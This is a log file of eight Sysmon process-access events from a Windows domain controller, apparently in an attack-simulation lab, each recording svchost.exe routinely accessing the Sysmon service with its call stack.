{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1434,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.182\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.182","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1435,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.182\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.182","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1436,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.182\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.182","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1437,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.182\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.182","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1438,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.182\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.182","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1439,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.182\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.182","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1440,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1441,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
